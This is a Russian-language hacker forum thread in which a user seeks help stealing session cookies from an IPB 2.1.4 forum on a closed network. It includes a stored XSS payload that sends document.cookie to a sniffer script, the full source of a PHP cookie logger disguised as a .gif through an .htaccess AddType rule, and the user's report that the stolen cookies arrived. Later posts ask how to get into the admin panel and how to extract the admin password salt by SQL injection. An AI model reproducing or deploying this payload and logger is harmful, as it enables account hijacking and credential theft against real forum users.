|
Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф?
Собстевнно как правильно настроить сниф на денвере локально...
Хочу вытащить куки с ipb 2.1.4 метод понял как а вот сниф как правильно настроить хз :) Спрашивается а зачем тебе локально то :) Да потомучто форум крутится в закрытой сетке в тырнет доступа нет.... Вот вопрочец ещо по xss через функции жалоба <script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script> Почему собственно сниф в .php я так понимаю что в версии 2.1.4 нет фильтрации на даный метод и даже не обязательно шифроваться под gif ?! |
А чё то так и не понял, что ты хочешь!!! в чём у тебя проблема ты не можешь всунуть скрипт в форум, или у тебя проблемы со скриптом, который получит кукки!??
|
ДА нет хочу сниф настроить локально у себя на вебсерваке так как сетка закрытая...
Вобщем как правильно его натроить чтоб перехватывал куки Я так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?! |
Цитата:
вторую часть вопроса вообще не понял, переформулируй его как-нибудь чтоли, распиши подробнее |
теперь понял, дополнительной настройки тебе никакой не надо просто ставишь сервак, делаешь дотупным из сети, заливаешь сниффер, кидаешь кому надо ссылку на него, в ней адрес до твоего сервака это твой ip в локальной сети
|
Распишу поподробней :
Есть скрипт снифа кидаю его сюда home\custom\www в файле .htaccess делаю настройки чтоб порт 80 светился в сетке далее на форуме юзаю данную xss через функции (жалоба) Правильно ?! или всеже денвер нужно донастроить чтоб он перехватывал куки... |
Цитата:
|
ничего донастраивать не надо, у тебя же куки передаются просто как параметры у скрипта
|
чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом
|
def_, угу.. просто будет типа http://yourcomp/sniffer.php?cookie=КУКИСЫ.
Отсюда видно, что достаточно настроить денвер так, чтобы он работал не только локально, а чтобы его было видно и из локалки. Dmitry507, ты что-то странное куришь) бросай0)) |
def_ ок понял значь правильно мыслил :)
А вторая часть вопроса... лазил по форуму нашел под версию ipb 2.1.4 эту xss <script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script> вот немогу понять обычно сниф сам скрипт замаскирован под gif а вданной xss получается можно даже его изменить на php и тоже полетат куки ?! |
Короче чувак. Денвер никак донастраивать не надо
|
Цитата:
Если ты на щет поставить себе етот форум и опробовать все ето :) то както непрет хотя c етого и надо было начинать... |
_Great_ ну это я понял уже что ненадо ок буду пробовать всем спасибо что не заставили долго ждать с ответами :))))
|
Хмм всеже не догоняю кое что :)
вот есть сниф состоит он из трех файлов .htaccess image.gif -картинка snif.gif - сам скрип снифа ------------------------------------------ содержание файла .htaccess : и зачем он нужен Код:
AddType application/x-httpd-php snif.gifКод:
<? // nerezus, 2005, GPL v2 // IF U WANNA USE .png(or .gif, .jpeg) EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?>Если я переименую gif на .php буду ли приходить куки или можно сослаться на gif в данном xss под этот форум ?! |
Поставил я значь себе этот форум ipb 2.1.4
Кидаю скрип в жалобы <script>img = new Image(); img.src = "http:/мой_веб/сниффер.php?"+location.host+document.cookie ;</script> Куки пришли :) Но почему потом при замене кукисов в опере для обычного юзера нечего не происходит как был юзером так и остается некакой админки и духу нет ?! |
А нет вру все проходит на ура :)
Но как до админки добраться если Админцентр потом требует повторного ввода пароля ?! |
Почитал тут форум :) оказывается не так все просто мало иметь хеш админа ещо нужна
соль :) Тогда назревает вопрос :) какие есть sql иньекции для ipb 2.1.4 чтобы пробить соль вот нарыл иньекцию SELECT converge_pass_salt FROM ibf_members_converge WHERE converge_id=тут_user_id А как ее заюзать где ее вставлять тут я профан :) |
это не инъекция, это просто оператор выборки из MySQL, выбирается соль юзера с таким-то ид из таблицы ibf_members_converge. Чтобы это выполнить тебе нужено иметь доступ к базе данных форума.
|
def_ спасиб пролил свет !!!
|
| Время: 06:26 |